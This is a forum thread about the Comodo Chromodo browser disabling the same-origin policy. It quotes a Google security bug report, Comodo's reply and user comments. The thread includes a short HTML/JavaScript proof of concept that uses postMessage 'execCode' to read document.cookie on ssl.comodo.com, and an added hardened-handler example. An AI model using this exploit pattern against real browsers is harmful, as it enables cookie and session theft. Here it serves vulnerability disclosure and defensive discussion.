I would like to know what our Comodo experts think of the situation. But I can imagine some of them saying something like "Meh. Nothing new. It's just Comodo being Comodo."
When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.
Chromodo Internet Browser
Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..
To reproduce, do something like this:
<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code: "alert(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
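For defenders reading the report above, this added example (not part of the thread or the bug report, and not Chromodo's code) contrasts a message handler that runs whatever an "execCode" message carries with one that checks `event.origin` and dispatches only from a fixed command table. The handler names, command table and origins are hypothetical, and the events are constructed plain objects so the block runs under Node.

```javascript
// Hypothetical privileged "message" handler, before and after hardening.
// All names and origins are assumptions for illustration, not Chromodo code.
const TRUSTED_ORIGINS = new Set(["https://extension-ui.example"]); // constructed

// Fixed command table: a message selects an action, it never supplies code.
const COMMANDS = {
  getVersion: () => "1.0.0",
  setTheme: (args) => (["light", "dark"].includes(args.theme) ? "theme:" + args.theme : null),
};

// Weak pattern: any origin is accepted and message-supplied code is run.
// runCode stands in for the privileged evaluator so nothing is really executed.
function weakHandler(event, runCode) {
  const msg = JSON.parse(event.data);
  if (msg.command === "execCode") return runCode(msg.code);
  return null;
}

// Hardened pattern: origin allowlist, strict parsing, command allowlist.
function hardenedHandler(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return { ok: false, reason: "origin" };
  let msg;
  try {
    msg = JSON.parse(event.data);
  } catch (e) {
    return { ok: false, reason: "parse" };
  }
  if (msg === null || typeof msg !== "object") return { ok: false, reason: "shape" };
  if (!Object.prototype.hasOwnProperty.call(COMMANDS, msg.command)) {
    return { ok: false, reason: "command" };
  }
  const result = COMMANDS[msg.command](msg.args || {});
  return result === null ? { ok: false, reason: "args" } : { ok: true, result };
}

// Constructed events standing in for what postMessage delivers to a listener.
const hostile = {
  origin: "https://attacker.example",
  data: JSON.stringify({ command: "execCode", code: "alert(document.cookie)" }),
};
const trusted = {
  origin: "https://extension-ui.example",
  data: JSON.stringify({ command: "setTheme", args: { theme: "dark" } }),
};

console.log(weakHandler(hostile, (code) => "would run: " + code));
console.log(hardenedHandler(hostile));
console.log(hardenedHandler(trusted));
```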
Aka "security through stupidity"! I'm eagerly anticipating the results for CIS, if this Chromodo disaster is a sign of things to come it will be a fallout for them.
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.
This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.
Indeed, that is a rather annoying nagscreen which you can turn off only after CAV has made its first detection. (it would seem that there is no option to directly disable it in COMODO's settings, rather only through the nagscreen)
If a threat is detected GeekBuddy pops up!!!!
Dragon does not seem to be affected though. Strange.
It was a Google engineer who conducted the test so he/she focused on the Chromium based version.
A js code introduced by a non Comodo code has caused this issue.
We have removed it and will do a release shortly.
We regret that Google did not follow its own responsible disclosure guideline and put users at risk by releasing this publicly, against their policy of 90 days.
We always care for our users and users come first.
We welcome the extra attention from Google since we launched Which Ad Blocker world's most comprehensive adblocking initiative that includes an Android ad blocker (http://www.amazon.com/COMODO-Security-Solution-Ad-Blocker/dp/B01ATW7NC6)
We invite Google, in the interest of user's security, to follow its own published guidelines for responsible disclosure.
******************************
Here is the note about Google responsible disclosure guideline, at the foot of the initial bug report, posted 21st Jan... of course it's not been 90 days since 21st Jan.
Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Sorry for off-topic - best choices: Avira, Avast, AVG, Qihoo 360 Total Security, F-Secure, ESET, Norton...
I've lost hope for Comodo, It was my favorite product since V2. Now, I don't trust them anymore and I don't like the "shady behavior". I will change it in 1-2 weeks (I need to finish some testing to see what will replace CIS). The sad part is that not only Comodo has some "shady behavior", there are more
They apparently love lying...
We regret that Google did not follow its own responsible disclosure guideline and put users at risk by releasing this publicly, against their policy of 90 days.
It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.
This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.
Issue 704 - google-security-research - Comodo: Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security. - Google Security Research - Google Project Hosting
What does that even mean? It's their own project and their "own" codebase, if it wasn't their own code it wouldn't be in the software and since no other Chromium based browser was affected by this I assume they are lying through their teeth.
A js code introduced by a non Comodo code has caused this issue. We have removed it and will do a release shortly.